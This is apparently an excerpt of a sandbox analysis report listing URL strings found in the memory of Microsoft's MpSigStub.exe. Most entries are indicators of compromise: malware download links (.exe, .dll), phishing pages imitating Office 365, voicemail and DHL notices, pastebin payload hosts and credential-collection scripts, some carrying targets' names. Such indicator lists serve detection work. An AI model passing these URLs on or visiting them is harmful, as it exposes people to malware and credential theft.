    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://mueblesmaple.com.mx/19.gif
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: https://muropronto.ibsweb.com.br/modules/mod_simplefileuploadv1.3/
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://myexternalip.com/raw
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://myexternalip.com/rawx
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://mylovelybluesky.com
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://myoffice365-online.com/login/common/login/mridings
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: https://myscape.in/ds/161120.gif
    Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: https://mywebscrap.com/ds/0402.gif
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: https://n9.cl/d9fii
    Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmpString found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://netorgft3012202.sharepoint.com/:b:/s/investments/ewhzfsivbvbdn1vhk8eejpcbnbcaan_xlbd5e7fn2lp
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://neuroconversions.com/wp-content/
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmpString found in binary or memory: https://neverlose.cc/
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://newsiest-grid.000webhostapp.com/dhl/dhla/dhl%20auto/index.php?email=kani.junichi
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: https://newtrp.com/e8/rexifly.php
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://newwets.com/zip/document.php
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://nhacaiuytin888.com/mail/now.php
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: https://notafiscaleletronica-e.com/master/
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getkys.kys
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://novaworld-resort.com/wp-admin/user/delis/ite1/links.doc
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: https://nowfoundation.org.uk/hx0smmmbiw/haurt.html
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: https://oauth2.googleapis
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: https://objectstorage.uk-london-1.oraclecloud.com/n/lrxg46lu57ma/
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmpString found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exe
    Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmpString found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exeac
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://oemands.dk/xmlrpc.php
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://office.com/start/myaccount.aspx
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://office.insureusun.com/?e=simona.merzagora
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: https://office.live.com/start/
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://office365.com
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://ohgstd-adnazad.c9users.io/update/validate/
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://oidblueprin.at/3/str.dll
    Source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmpString found in binary or memory: https://oksearch.org/xa2/click.html
    Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmpString found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
    Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: https://one.co.il
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download.aspx?cid=7df9938cb8d94df3&authkey=%21ajy8jfax0aqsibs&resid=7df993
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://onestoprnd.com/wp-content/plugins_new/1902/next.php
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: https://onlinebebeksepeti.com/puyo/
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: https://opposedent.com/css/main.css/send.css
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: https://organigrama.gualda.com
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://ostoja.tk/browser.php
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: https://ourcomm.co.uk/wp-content/plugins/buddyboss-platfo
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com/api/
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: https://ovjdyp9iz3r.typeform.com/to/kpapmnfe
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: https://ozmontelectrical.com/drms/fert.html
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: https://paf.gov-mail.net/13621/1/18844/2/0/0/1390324815/files-b74d99d6/hta
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://panolinuk-my.sharepoint.com/:b:/g/personal/paul_holland_panolin_co_uk/eewdyq0-yzdfhxzreappqk
    Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmpString found in binary or memory: https://paste.ee/d/n9jsq/0
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: https://paste.ee/r/26jiy/0
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://paste.ee/r/c9fe4/0
    Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmpString found in binary or memory: https://paste.ee/r/cikn9/0
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw
    Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/2STTYftz
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/G0jcGs79
    Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/g10EQ6PS
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/sf3gviaw
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpString found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpString found in binary or memory: https://pastebinp.com/raw/itDEZ39X
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://paxful.com
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://pay.2go.com/payment/2-1301222-qoo1mwri7zqbuxa2)
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: https://pay.yac.mx
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: https://pay.yac.mxx:
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
    Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmpString found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: https://personalizasp.com.br/wp-admin/maint/redirect/
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: https://petlineir.com/mason/amstream.exe
    Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmpString found in binary or memory: https://photofinderplus.com/s/?api=
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: https://picsum.photos/80
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: https://pigeonious.com/
    Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmpString found in binary or memory: https://pigeonious.com/img/
    Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmpString found in binary or memory: https://pinkconnext.com/ds/26.gif
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: https://piscineconstruct.ro/kjy/index.php
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: https://pjoao1578pro2.site/crypt/vbscript.txt
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: https://playmesadelsol.com/wp-content/off/rt35.exe
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://poOsKYsdcast.oigaprofe.com.mx/wp-includes/sodiumOsKYs_comOsKYspat/src/Core32/ChaCha20/KlrIU4
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://podcast.oigaprofe.com.mx/wp-includes/sodium_compat/src/Core32/ChaCha20/KlrIU42g.php
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: https://pomf.pw/files/
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: https://postotravessia.com.br/wp-admin/network/redirect/
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: https://ppam.sslblindado.com/pande.html
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://preoccupationology.com/thisshit
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: https://pressionism.xyz/bbc.exe
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: https://pro-fit.pk/exploit.exe
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://producingemotions.es/settlementstatements242019/cgi-bin/office/index.html
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://produsedecalitate.ro/request.php
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: https://uis.public360online.com:443/biz/v2-pbr/docprod/templates/_uis%20moteinnkalling_referat.docx
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: https://uniquestyle.dk/wp-content/themes/ifeaturepro5-child/gr.mpwq
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
    Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmpString found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://updatesdomainn.ml/
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://updatesdomainn.ml/post.php
    Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmpString found in binary or memory: https://upload.cat/
    Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://uploadvirus.com/uploads/
    Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmpString found in binary or memory: https://upt.fastsearch.me/
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: https://upurl.me/m7oiv
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: https://upurl.me/vvkzd
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: https://uringvermi.at/3/zet.dll
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: https://utilities.pcpitstop.com
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: https://vamoss.com.br/blogfolio/wp-content/upgrabe/
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://vaqww.dyndns.dk/tolly5/
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpString found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: https://vespang.cf/aggreey/post.php
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://victoriaparkmazda-my.sharepoint.com/personal/ann_victoriaparkmazda_co_uk/_layouts/15/guestac
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: https://vieeewen.org/ddy/next.php
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: https://vieeewen.org/tgg/next.php
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: https://viro.mleydier.fr/noauth
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://vm.jt-voicem.club/?e=ckoonce
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://vm.jt-voicem.club/?e=ljeffcoat
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://vmnames.ssvoipsx.xyz/?e=%25
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: https://vmnapi.net/vmap/1.0/yhs/ms/yhs/?vmimp=
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://vn.pr-nijim.xyz/?e=soumu
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://voice.vm-business.online/?e=jscott
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: https://voicemailss.hozoimn.xyz/?e=twfyawx5bi5kywvja2vslw1peebnyxjhdghvbkvszwn0cmljlmnvbq==
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: https://voipses.eononass.xyz/?e=%25
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: https://voipss.snonames.xyz/?e=%25
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpString found in binary or memory: https://vooydvclhlqukhdvrsxe.com/tx.dll
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://voyya.com.mx/wp-content/themes/Divi/incl(
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://vp.videomeet.club/?e=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://vr2oq.csb.app/
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: https://vsit.site/
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: https://vsit.site/4a8gk
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: https://vsit.site/ghqec
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: https://vsit.site/xndcx
    Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmpString found in binary or memory: https://vtsamples.commondatastorage.googleapis.com/
    Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmpString found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gcbs
    Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmpString found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gccs
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://wacochamber.com/
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: https://wayphositu.info/nasm3m/chalo.php?id=154789
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: https://we.tl/t-ccUfUrQOhF
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
    Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmpString found in binary or memory: https://webmailx.space/ml/ama/4/excel/log.php
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: https://www-cdn.getwebcake.com/
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: https://www.%s.com.br/
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: https://www.4shared.com/download/pJhaizQgba/wd11.exe
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%xc
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://www.4shared.com/web/directdownload/plcok719ce/hhnjnm.d9cc6b8210cf7f938818851
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.admos-gleitlager.de/feed/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.advokathuset.dk/auktioner/tvangsauktioner/saadan-koeber-du-paa-tvangsauktion
    Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmpString found in binary or memory: https://www.aec.com.my/aec_5.5/public/ph/h/page.php
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: https://www.africafooddistribution.com/wp-content/themes/topxoh/sloch/index.php
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.anca-aste.it/uploads/form/boeing_spe_leos_logo.jpg
